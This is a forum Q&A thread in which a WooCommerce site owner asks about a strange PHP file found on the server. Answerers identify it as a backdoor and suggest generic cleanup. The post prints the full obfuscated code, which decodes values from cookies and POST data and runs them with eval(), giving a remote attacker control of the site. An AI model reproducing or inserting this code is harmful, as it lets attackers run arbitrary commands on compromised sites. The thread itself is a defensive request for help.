# Unknow php file in wordpress core

Tags: woocommerce-offtopic

My woo-commerce site contain a some unknowing PHP file, that i cant find out its purpose.

Here is the sample of the code ,

```
<?php
$qyxrjyu = 'vxoa_6p*5ci#0l1e4nH7mdsk-rg2t3u9by\'';$dtwaxz = Array();$dtwaxz[] = $qyxrjyu[18].$qyxrjyu[7];$dtwaxz[] = $qyxrjyu[11];$dtwaxz[] = $qyxrjyu[21].$qyxrjyu[14].$qyxrjyu[29].$qyxrjyu[27].$qyxrjyu[19].$qyxrjyu[21].$qyxrjyu[5].$qyxrjyu[12].$qyxrjyu[24].$qyxrjyu[31].$qyxrjyu[3].$qyxrjyu[27].$qyxrjyu[16].$qyxrjyu[24].$qyxrjyu[16].$qyxrjyu[12].$qyxrjyu[8].$qyxrjyu[15].$qyxrjyu[24].$qyxrjyu[32].$qyxrjyu[16].$qyxrjyu[29].$qyxrjyu[8].$qyxrjyu[24].$qyxrjyu[15].$qyxrjyu[14].$qyxrjyu[31].$qyxrjyu[8].$qyxrjyu[8].$qyxrjyu[9].$qyxrjyu[16].$qyxrjyu[31].$qyxrjyu[29].$qyxrjyu[8].$qyxrjyu[29].$qyxrjyu[19];$dtwaxz[] = $qyxrjyu[9].$qyxrjyu[2].$qyxrjyu[30].$qyxrjyu[17].$qyxrjyu[28];$dtwaxz[] = $qyxrjyu[22].$qyxrjyu[28].$qyxrjyu[25].$qyxrjyu[4].$qyxrjyu[25].$qyxrjyu[15].$qyxrjyu[6].$qyxrjyu[15].$qyxrjyu[3].$qyxrjyu[28];$dtwaxz[] = $qyxrjyu[15].$qyxrjyu[1].$qyxrjyu[6].$qyxrjyu[13].$qyxrjyu[2].$qyxrjyu[21].$qyxrjyu[15];$dtwaxz[] = $qyxrjyu[22].$qyxrjyu[30].$qyxrjyu[32].$qyxrjyu[22].$qyxrjyu[28].$qyxrjyu[25];$dtwaxz[] = $qyxrjyu[3].$qyxrjyu[25].$qyxrjyu[25].$qyxrjyu[3].$qyxrjyu[33].$qyxrjyu[4].$qyxrjyu[20].$qyxrjyu[15].$qyxrjyu[25].$qyxrjyu[26].$qyxrjyu[15];$dtwaxz[] = $qyxrjyu[22].$qyxrjyu[28].$qyxrjyu[25].$qyxrjyu[13].$qyxrjyu[15].$qyxrjyu[17];$dtwaxz[] = $qyxrjyu[6].$qyxrjyu[3].$qyxrjyu[9].$qyxrjyu[23];foreach ($dtwaxz[7]($_COOKIE, $_POST) as $gitjw => $lsobabb){function mmkwylm($dtwaxz, $gitjw, $wkzdbr){return $dtwaxz[6]($dtwaxz[4]($gitjw . $dtwaxz[2], ($wkzdbr / $dtwaxz[8]($gitjw)) + 1), 0, $wkzdbr);}function irbcfeg($dtwaxz, $bgmei){return @$dtwaxz[9]($dtwaxz[0], $bgmei);}function obdaxad($dtwaxz, $bgmei){$pswrfp = $dtwaxz[3]($bgmei) % 3;if (!$pswrfp) {eval($bgmei[1]($bgmei[2]));exit();}}$lsobabb = irbcfeg($dtwaxz, $lsobabb);obdaxad($dtwaxz, $dtwaxz[5]($dtwaxz[1], $lsobabb ^ mmkwylm($dtwaxz, $gitjw, $dtwaxz[8]($lsobabb))));}
```

Could any one explain me whats the purpose of these code?

Thanks.

Answer (score 3):

It’s definitely not a file from WordPress.

It’s a file with obfuscated code, so it’s hard to read and say what it does exactly.

Most probably it’s a backdoor or some other malicious file lest on your server by attacker/malware infection.

Comment: I Think so, my site also facing  redirecting to a Spam site issue.

Comment: @RashidRcp so yeah - it’s infected. Now you have to clean it and secure it properly - otherwise it will get infected again.

Comment: Could you suggest  any options to solve this issue?

Comment: @RashidRcp for cleaning? Yeah - restore original files of WP, plugins and themes. Then scan all the DB and other files and search for any malicious scripts. And when you’re certain that the site is clean, then configure it properly.